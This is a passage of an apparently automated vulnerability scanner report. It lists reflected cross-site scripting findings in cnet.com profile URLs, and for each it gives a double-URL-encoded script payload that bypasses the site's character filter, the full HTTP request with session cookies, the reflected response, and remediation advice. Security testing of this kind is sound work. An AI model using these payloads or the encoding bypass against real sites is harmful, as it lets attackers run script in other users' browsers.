HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:11 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:11 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=987 Connection: Keep-Alive Content-Length: 31135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Leslie Katzbb1ab"><script>alert(1)</script>5ed168db2c"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2114e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd2a882254e was submitted in the REST URL parameter 2. This input was echoed as 2114e"><script>alert(1)</script>bd2a882254e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MEPace2114e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd2a882254e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=953 Connection: Keep-Alive Content-Length: 31083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="MEPace2114e"><script>alert(1)</script>bd2a882254e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e11a4%253cscript%253ealert%25281%2529%253c%252fscript%253e05d9e459082 was submitted in the REST URL parameter 2. This input was echoed as e11a4<script>alert(1)</script>05d9e459082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MEPacee11a4%253cscript%253ealert%25281%2529%253c%252fscript%253e05d9e459082/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:34 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 30998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>MEPacee11a4<script>alert(1)</script>05d9e459082's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ab8b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e675ddd9df60 was submitted in the REST URL parameter 2. This input was echoed as 6ab8b"><script>alert(1)</script>675ddd9df60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Maggie+Reardon6ab8b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e675ddd9df60/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:22 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:22 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Length: 31205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Maggie Reardon6ab8b"><script>alert(1)</script>675ddd9df60"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d4e8%253cscript%253ealert%25281%2529%253c%252fscript%253e05a7b0e3d48 was submitted in the REST URL parameter 2. This input was echoed as 3d4e8<script>alert(1)</script>05a7b0e3d48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Maggie+Reardon3d4e8%253cscript%253ealert%25281%2529%253c%252fscript%253e05a7b0e3d48/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:23 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:24 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=973 Connection: Keep-Alive Content-Length: 31146
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Maggie Reardon3d4e8<script>alert(1)</script>05a7b0e3d48's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f53d546bc6 was submitted in the REST URL parameter 2. This input was echoed as c93ec"><script>alert(1)</script>3f53d546bc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Matt+Asayc93ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f53d546bc6/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:16 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:16 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=994 Connection: Keep-Alive Content-Length: 31075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Matt Asayc93ec"><script>alert(1)</script>3f53d546bc6"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ca32%253cscript%253ealert%25281%2529%253c%252fscript%253e867bbd93cb4 was submitted in the REST URL parameter 2. This input was echoed as 2ca32<script>alert(1)</script>867bbd93cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Matt+Asay2ca32%253cscript%253ealert%25281%2529%253c%252fscript%253e867bbd93cb4/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:17 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:17 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=946 Connection: Keep-Alive Content-Length: 31044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Matt Asay2ca32<script>alert(1)</script>867bbd93cb4's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb7ce%253cscript%253ealert%25281%2529%253c%252fscript%253e737ce974169 was submitted in the REST URL parameter 2. This input was echoed as eb7ce<script>alert(1)</script>737ce974169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MattRosoffeb7ce%253cscript%253ealert%25281%2529%253c%252fscript%253e737ce974169/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:20 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:20 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>MattRosoffeb7ce<script>alert(1)</script>737ce974169's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8dd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb25b67b9bcd was submitted in the REST URL parameter 2. This input was echoed as e8dd2"><script>alert(1)</script>b25b67b9bcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MattRosoffe8dd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb25b67b9bcd/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:19 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:19 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=982 Connection: Keep-Alive Content-Length: 31087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="MattRosoffe8dd2"><script>alert(1)</script>b25b67b9bcd"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a04c0%253cscript%253ealert%25281%2529%253c%252fscript%253e05f1eb9883b was submitted in the REST URL parameter 2. This input was echoed as a04c0<script>alert(1)</script>05f1eb9883b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MoskovciakMa04c0%253cscript%253ealert%25281%2529%253c%252fscript%253e05f1eb9883b/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:02 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:02 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=972 Connection: Keep-Alive Content-Length: 31097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>MoskovciakMa04c0<script>alert(1)</script>05f1eb9883b's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5386%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadefb11b575 was submitted in the REST URL parameter 2. This input was echoed as d5386"><script>alert(1)</script>adefb11b575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MoskovciakMd5386%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadefb11b575/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:01 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:01 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="MoskovciakMd5386"><script>alert(1)</script>adefb11b575"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aae89%253cscript%253ealert%25281%2529%253c%252fscript%253e80beff7c63a was submitted in the REST URL parameter 2. This input was echoed as aae89<script>alert(1)</script>80beff7c63a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
